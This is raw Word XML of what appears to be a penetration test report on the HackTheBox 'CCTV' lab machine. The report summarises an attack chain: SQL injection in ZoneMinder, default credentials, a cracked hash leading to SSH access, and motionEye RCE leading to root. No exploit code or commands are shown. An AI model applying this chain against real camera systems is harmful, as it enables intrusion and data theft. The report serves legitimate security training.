      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="12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Findings are presented in logical attack chain order — each one built on the previous — with severity ratings explaining why each was classified as Critical or High.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">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1300"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1920"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="400"/>
            <w:gridCol w:w="2800"/>
            <w:gridCol w:w="1300"/>
            <w:gridCol w:w="1100"/>
            <w:gridCol w:w="2200"/>
            <w:gridCol w:w="19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2D">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2E">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2F">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30">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CVSS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31">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32">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3">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="00000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4">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection — CVE-2024-51482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5">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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6">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Full database dump — all passwords stolen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8">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ZoneMinder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9">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="00000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A">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE in motionEye — CVE-2025-60787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B">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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C">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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D">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell — complete system takeover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3E">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">motionEye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3F">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="00000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0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Default Credentials (admin:admin)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1">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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2">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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3">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthorized admin access to ZoneMinder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4">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ZoneMinder Web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5">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="00000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6">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak User Password — Hash Cracked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7">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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8">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c55a11"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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9">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH access gained as user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4A">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">User account (mark)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="0" w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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Business Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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With root access, a real attacker could: steal all files and camera footage, install ransomware and demand payment, create hidden backdoors for future access, disable all cameras before a physical break-in, and expose the company to GDPR fines for any personal data breach.</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04F">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2.  ENGAGEMENT OVERVIEW</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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Objective</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="14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To simulate a real-world external attack against the CCTV machine from scratch — with no prior knowledge — and identify all vulnerabilities, exploit them, escalate privileges to root, and document every step with evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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Scope &amp; Rules</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:spacing w:after="6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In Scope: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.129.19.244 (cctv.htb) — all ports and services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:spacing w:after="6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Test Type: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Black Box — no credentials or prior knowledge provided</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="6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VPN Tester IP: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.15.170 (tun0 interface)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:spacing w:after="6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Testing Period: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12th April 2026 — 20th April 2026</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="16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Platform: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox — legal, controlled environment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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About the Target</w:t>
      </w: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CCTV machine simulates a fictional company called "SecureVision" that provides CCTV monitoring services. It runs two real-world camera management applications — ZoneMinder and motionEye — both of which contained exploitable vulnerabilities at the time of testing.</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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00.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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3.  METHODOLOGY</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="14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test followed the Penetration Testing Execution Standard (PTES) framework across six phases:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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3200"/>
        <w:gridCol w:w="5960"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="560"/>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="5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5F">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60">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61">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Was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62">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63">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Reconnaissance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64">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap scan to discover open ports and running services on the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5">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6">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Enumeration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7">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Visited the website, identified ZoneMinder and motionEye, tested for default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68">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69">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6A">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited SQL injection (CVE-2024-51482) using SQLMap to extract all database credentials.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B">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C">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Post-Exploitation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06D">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cracked password hash with John the Ripper, logged in via SSH as user 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6E">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6F">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Privilege Escalation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0">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovered motionEye running as root. Exploited CVE-2025-60787 to gain root shell.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71">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>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72">
            <w:pPr>
              <w:spacing w:after="130" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
